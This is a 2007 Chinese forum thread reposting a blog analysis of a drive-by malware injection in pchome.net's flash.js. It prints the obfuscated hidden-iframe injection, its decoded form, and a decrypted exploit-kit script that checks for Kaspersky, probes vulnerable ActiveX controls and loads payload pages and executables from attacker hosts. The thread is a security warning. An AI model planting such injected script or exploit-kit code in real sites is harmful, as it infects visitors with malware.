广东商学院校园风在线 » 【电脑·数码·IT】知识·解答 » 小心！Pchome.net出现大面积挂马现象，敬请会员们注意安全！

卡门 发表于 2007-12-27 18:16

小心！Pchome.net出现大面积挂马现象，敬请会员们注意安全！

[font=宋体][size=4][color=#0000ff]截至2007-12-27 12:48未修复
[/color][/size]

[b][size=7.5pt]##[/size][/b][b][size=7.5pt]Ｉ#ＫＥ+Ｘ#Ｄ=$Ｉ#ＫＥ+ＸＤＩ=ＫＥ+=Ｘ++Ｄ$ＩＫ#Ｅ#Ｘ+ＤＩ$ＫＥ+Ｘ=Ｄ=ＩＫ$Ｅ+$Ｘ=$Ｄ#Ｉ+$ＫＥＸ$#ＤＩ+Ｋ#ＥＸＤ=ＩＫＥ+Ｘ#Ｄ#=Ｉ==Ｋ+Ｅ==ＸＤ+Ｉ#Ｋ$Ｅ$#Ｘ$Ｄ##Ｉ[/size][/b][/font]

[size=3][font=宋体]从论坛看到的消息说pchome的某页面被挂马了，于是上去找，[url=http://article.pchome.net/content-502393-7.html#topView]http://article.pchome.net/content-502393-7.html#topView[/url][/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]挂得比较隐蔽，[url=http://btn.pchome.net/flash.js]http://btn.pchome.net/flash.js[/url]的中间被加入了如下代码：[/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');[/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]也就是这个了：[/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');[/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]但只有这个js还不会使得那个iframe生效，使得他生效的是调用这个js显示flash 的代码：[/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]<script language="javascript" type="text/javascript">
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
</script>[/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]有了这个，iframe就生效了；经过一番调用和解密后得：[/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="[color=red]http://w18.vg/real.gif[/color]"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="[color=red]http://w18.vg/ms.gif[/color]"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="[color=red]http://w18.vg/xl.gif[/color]"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="[color=red]http://w18.vg/lz.gif[/color]"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="[color=red]http://w18.vg/bf.gif[/color]"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="[color=red]http://w18.vg/baidu.gif[/color]"></iframe>')}catch(e){}}[/font][/size]
[font=宋体][size=3][/size][/font][size=3][font=宋体][/font][/size]
[b][font=宋体][size=7.5pt]Ｋ##Ｅ+ＸＤ++ＩＫ+ＥＸ=#Ｄ$ＩＫＥＸＤ+$Ｉ#ＫＥＸＤＩ+Ｋ$ＥＸ$ＤＩ$$ＫＥ##Ｘ#ＤＩ=Ｋ+Ｅ$Ｘ=$ＤＩ#Ｋ+#ＥＸ=ＤＩＫ=Ｅ$=ＸＤＩＫ=$ＥＸ=ＤＩＫ$Ｅ$#Ｘ=Ｄ=Ｉ##ＫＥ#=Ｘ+$Ｄ+[/size][/font][/b]
[b][font=宋体][size=7.5pt]
[/size][/font][/b]
[size=3][font=宋体]挑了几个解密得：[b][color=red][font=宋体]http://w18.vg/s.exe[/font][/color][/b][/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]从这个文件里面得到另外一个链接：[b][color=red][font=宋体]http://w18.vg/ss.exe[/font][/color][/b][/font][/size]
[size=3][font=宋体][/font][/size]
[size=3][font=宋体]有点面熟的东西……[/font][/size]
[size=3][font=宋体][/font][/size]
[b][font=宋体][size=7.5pt]##[/size][/font][/b][b][font=宋体][size=7.5pt]Ｋ=Ｅ#Ｘ+Ｄ=ＩＫＥ$ＸＤ$=Ｉ==Ｋ+#ＥＸＤ=#Ｉ=ＫＥ$+ＸＤＩ#Ｋ$=ＥＸ=Ｄ=#ＩＫ+Ｅ=Ｘ$Ｄ==Ｉ=#Ｋ=Ｅ##Ｘ$Ｄ$+ＩＫ=#ＥＸＤ+ＩＫ$ＥＸ$=Ｄ+Ｉ+Ｋ#Ｅ$ＸＤ+ＩＫＥＸ#Ｄ[/size][/font][/b]

[size=3][font=宋体]从上面可以知道，出问题的是那个flash.js，因此所有使用这个js来放flash的页面全都有毒了！我随便找了几个页面，发现都是有毒的，这回可是大面积的被挂咯，同志们自己小心了。[/font][/size]
[size=3][font=宋体][/font][/size]
[b][font=宋体][size=7.5pt]Ｋ$ＥＸ=+ＤＩ#$ＫＥ+Ｘ#ＤＩＫ$ＥＸＤ$Ｉ=ＫＥ$ＸＤ+#Ｉ+ＫＥＸＤ=Ｉ+ＫＥ=Ｘ$Ｄ=Ｉ=ＫＥＸＤ#=ＩＫ==Ｅ$Ｘ=Ｄ=Ｉ#+ＫＥＸＤ=ＩＫ#ＥＸ#ＤＩ=Ｋ=Ｅ=Ｘ=#ＤＩＫＥＸＤＩ#ＫＥ[/size][/font][/b]

[font=宋体][size=9pt]转载请保留声明！（[url=http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html][color=#0000ff]http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html[/color][/url]） [/size][/font]
[font=宋体]
[/font]
[font=宋体][size=9pt]作者dikex（六翼刺猬），原文链接：[color=#800080][url=http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html][color=#0000ff]http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html[/color][/url] [/color][/size][/font]
[font=Times New Roman][/font]

是这几个比较常见的漏洞。暴风，迅雷，联众，百度搜霸、real。

[[i] 本帖最后由 卡门 于 2007-12-28 16:20 编辑 [/i]]

Pentium9 发表于 2007-12-27 21:44

发有代码的东西请勾上“禁用 Smilies”

年糕 发表于 2007-12-27 23:21

这帖发在这里几个人会看懂........:985641103: 再汗一次LZ的签名档

查看完整版本: 小心！Pchome.net出现大面积挂马现象，敬请会员们注意安全！